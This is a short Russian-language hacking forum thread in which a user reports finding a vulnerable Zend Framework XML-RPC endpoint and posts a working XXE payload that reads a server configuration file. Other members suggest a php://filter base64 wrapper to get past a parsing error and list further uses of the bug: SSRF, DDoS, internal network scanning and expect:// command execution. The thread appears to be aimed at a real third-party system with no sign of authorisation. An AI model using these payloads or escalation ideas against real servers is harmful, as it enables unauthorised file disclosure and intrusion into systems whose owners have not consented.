Старый 07.05.2014, 21:24   #1
beau
 
Регистрация: 04.04.2014
Сообщений: 18
Репутация: 0
Question Вопросы по XXE injection в Zend Framework

Нашел уязвимый ресурс, но есть проблемка, на запрос:
Цитата:
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT methodName ANY >
<!ENTITY xxe SYSTEM "file:///etc/httpd/conf.d/welcome.conf" >]>
<methodCall>
<methodName>&xxe;</methodName>
</methodCall>
Получаем ответ:
Цитата:
Failed to parse XML-RPC request: Element type "LocationMatch" must be followed by either attribute specifications, "&gt;" or "/&gt;".
Я как понимаю, это из-за директивы LocationMatch в конфиге, который инклудится(спец-символы) и как-то надо их проэкранировать. Возможно ли обойти этот момент?
И еще вопрос - помимо чтения файлов и папок можно ли как-то заюзать багу?
beau вне форума   Ответить с цитированием
Старый 07.05.2014, 22:41   #2
wget
 
Аватар для wget
 
Регистрация: 16.06.2012
Сообщений: 33
Репутация: 5
По умолчанию

Попробуй что-нибудь из этого.
wget вне форума   Ответить с цитированием
Старый 08.05.2014, 15:31   #3
oRb
 
Аватар для oRb
 
Регистрация: 01.07.2010
Сообщений: 319
Репутация: 138
По умолчанию

php://filter/read=convert.base64-encode/resource=/etc/httpd/conf.d/welcome.conf
__________________
Не оказываю никаких услуг.
I don't provide any services.
oRb вне форума   Ответить с цитированием
Старый 09.05.2014, 01:44   #4
beau
 
Регистрация: 04.04.2014
Сообщений: 18
Репутация: 0
По умолчанию

к сожелению
Цитата:
Failed to read XML-RPC request: unknown protocol: php
Хотя в папке /etc есть php.ini
beau вне форума   Ответить с цитированием
Старый 10.05.2014, 11:31   #5
shampoo
 
Регистрация: 30.10.2013
Сообщений: 10
Репутация: 1
По умолчанию

Цитата:
Сообщение от beau Посмотреть сообщение
И еще вопрос - помимо чтения файлов и папок можно ли как-то заюзать багу?
SSRF, DDoS, Iternal Network Scan, а также, если повезет, в PHP можно встретить: expect://cmd
shampoo вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2020, Jelsoft Enterprises Ltd. Перевод: zCarot